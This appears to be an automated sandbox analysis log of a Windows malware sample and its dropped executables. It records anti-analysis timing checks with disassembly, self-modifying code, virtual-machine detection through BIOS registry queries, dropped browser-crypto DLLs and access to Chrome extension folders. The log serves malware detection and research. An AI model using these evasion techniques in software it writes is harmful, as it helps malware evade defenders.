Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B660BD second address: B660C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B67FB7 second address: B67FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B68592 second address: B68596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6873C second address: B68742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B68B57 second address: B68B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B68B5B second address: B68B70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a or esi, 7E605B50h 0x00000010 nop 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B68C1D second address: B68C23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B68C23 second address: B68C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B68DAC second address: B68DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B68EC1 second address: B68EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c jl 00007FF0EC517C76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B69615 second address: B696A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jne 00007FF0EC6B64CEh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FF0EC6B64C8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c pushad 0x0000002d mov cx, dx 0x00000030 sub cl, 00000054h 0x00000033 popad 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FF0EC6B64C8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 movsx esi, cx 0x00000053 or edi, 731DE286h 0x00000059 push 00000000h 0x0000005b jmp 00007FF0EC6B64CEh 0x00000060 push eax 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B696A6 second address: B696AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6A00C second address: B6A03C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF0EC6B64C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push esi 0x0000000e sub dword ptr [ebp+122D3179h], ebx 0x00000014 pop esi 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D302Fh] 0x0000001d push 00000000h 0x0000001f mov esi, 63665402h 0x00000024 xchg eax, ebx 0x00000025 jg 00007FF0EC6B64D0h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6A03C second address: B6A05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF0EC517C87h 0x00000010 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6B11A second address: B6B131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 ja 00007FF0EC6B64C6h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FF0EC6B64C6h 0x00000017 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6D1D3 second address: B6D1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF0EC517C76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B71C04 second address: B71C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b clc 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+1244D635h], edx 0x00000014 push 00000000h 0x00000016 movzx ebx, di 0x00000019 mov ebx, dword ptr [ebp+122D2CB9h] 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop esi 0x00000026 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B72BED second address: B72BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B72BF1 second address: B72C0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B77CAC second address: B77CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B77CB1 second address: B77D1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FF0EC6B64C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FF0EC6B64C8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 je 00007FF0EC6B64C8h 0x00000049 mov bh, 17h 0x0000004b push 00000000h 0x0000004d stc 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FF0EC6B64CEh 0x00000056 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B79FE4 second address: B7A010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C7Fh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF0EC517C83h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B7A010 second address: B7A014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B7A014 second address: B7A01E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0EC517C76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B7C71D second address: B7C723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B7D8BE second address: B7D8C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B81952 second address: B819A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FF0EC6B64D8h 0x00000012 push 00000000h 0x00000014 cld 0x00000015 push 00000000h 0x00000017 mov edi, 63BEA4AEh 0x0000001c push eax 0x0000001d pushad 0x0000001e jmp 00007FF0EC6B64D7h 0x00000023 je 00007FF0EC6B64CCh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B8294F second address: B82954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B82954 second address: B829C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FF0EC6B64C8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 jno 00007FF0EC6B64CCh 0x0000002b mov ebx, 08449803h 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D30CEh] 0x00000038 push 00000000h 0x0000003a xor bx, 4791h 0x0000003f push eax 0x00000040 pushad 0x00000041 jo 00007FF0EC6B64D5h 0x00000047 jmp 00007FF0EC6B64CFh 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF0EC6B64CDh 0x00000053 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B829C9 second address: B829CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B69EA1 second address: B69EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B69EA6 second address: B69EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B69EB0 second address: B69EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6B9D5 second address: B6B9DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6C449 second address: B6C44F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6C44F second address: B6C453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6C453 second address: B6C461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B6CF2A second address: B6CF42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C84h 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B73F5A second address: B73F74 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0EC6B64CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c je 00007FF0EC6B64CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B74E3D second address: B74E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C82h 0x00000009 popad 0x0000000a jl 00007FF0EC517C78h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FF0EC517C7Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B74E68 second address: B74E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B77EA0 second address: B77EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF0EC517C76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B77EAB second address: B77EB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FF0EC6B64C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B8FF0E second address: B8FF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B8FF12 second address: B8FF2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B1CE62 second address: B1CE7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF0EC517C83h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B92AFB second address: B92B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FF0EC6B64CDh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B92B16 second address: B92B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B92B1B second address: B92B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B92B20 second address: B92B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B92C01 second address: 9BED6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2097CC02h 0x00000010 pushad 0x00000011 je 00007FF0EC6B64CBh 0x00000017 and di, 2600h 0x0000001c mov ax, cx 0x0000001f popad 0x00000020 push dword ptr [ebp+122D06B9h] 0x00000026 jmp 00007FF0EC6B64D4h 0x0000002b call dword ptr [ebp+122D207Ch] 0x00000031 pushad 0x00000032 jmp 00007FF0EC6B64D4h 0x00000037 xor eax, eax 0x00000039 jmp 00007FF0EC6B64D6h 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 clc 0x00000043 mov dword ptr [ebp+122D3B62h], eax 0x00000049 cld 0x0000004a mov esi, 0000003Ch 0x0000004f mov dword ptr [ebp+122D2050h], edx 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 mov dword ptr [ebp+122D2050h], ebx 0x0000005f cld 0x00000060 lodsw 0x00000062 mov dword ptr [ebp+122D2FAFh], edx 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D2FAFh], eax 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 mov dword ptr [ebp+122D2FAFh], esi 0x0000007d popad 0x0000007e or dword ptr [ebp+122D2050h], ecx 0x00000084 nop 0x00000085 jns 00007FF0EC6B64D0h 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 pop edx 0x00000092 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B93ED0 second address: B93EDD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B7DAA5 second address: B7DAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B7EB46 second address: B7EB4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B81B26 second address: B81B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B81B2A second address: B81B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF0EC517C7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B81B38 second address: B81B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B984D9 second address: B984E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B984E3 second address: B984F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jo 00007FF0EC6B64DBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B9860B second address: B9861B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007FF0EC517C76h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe RDTSC instruction interceptor: First address: B98882 second address: B98886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7A5376 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5ED592 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5EFE6E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7B35F2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 82EE49 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Special instruction interceptor: First address: 9BEDE0 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Special instruction interceptor: First address: 9BED17 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Special instruction interceptor: First address: B5E3FF instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Special instruction interceptor: First address: B6F87A instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Special instruction interceptor: First address: 9BECE0 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Special instruction interceptor: First address: BE9F39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: A7EDE0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: A7ED17 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C1E3FF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C2F87A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: A7ECE0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CA9F39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_04A206B3 rdtsc 16_2_04A206B3
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe TID: 7776 Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7772 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7844 Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7764 Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7748 Thread sleep count: 43 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7748 Thread sleep time: -86043s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7756 Thread sleep count: 37 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7756 Thread sleep time: -74037s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7752 Thread sleep time: -56028s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6064 Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6064 Thread sleep time: -1590000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6064 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB6EBF0 PR_GetNumberOfProcessors,GetSystemInfo, 0_2_6CB6EBF0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
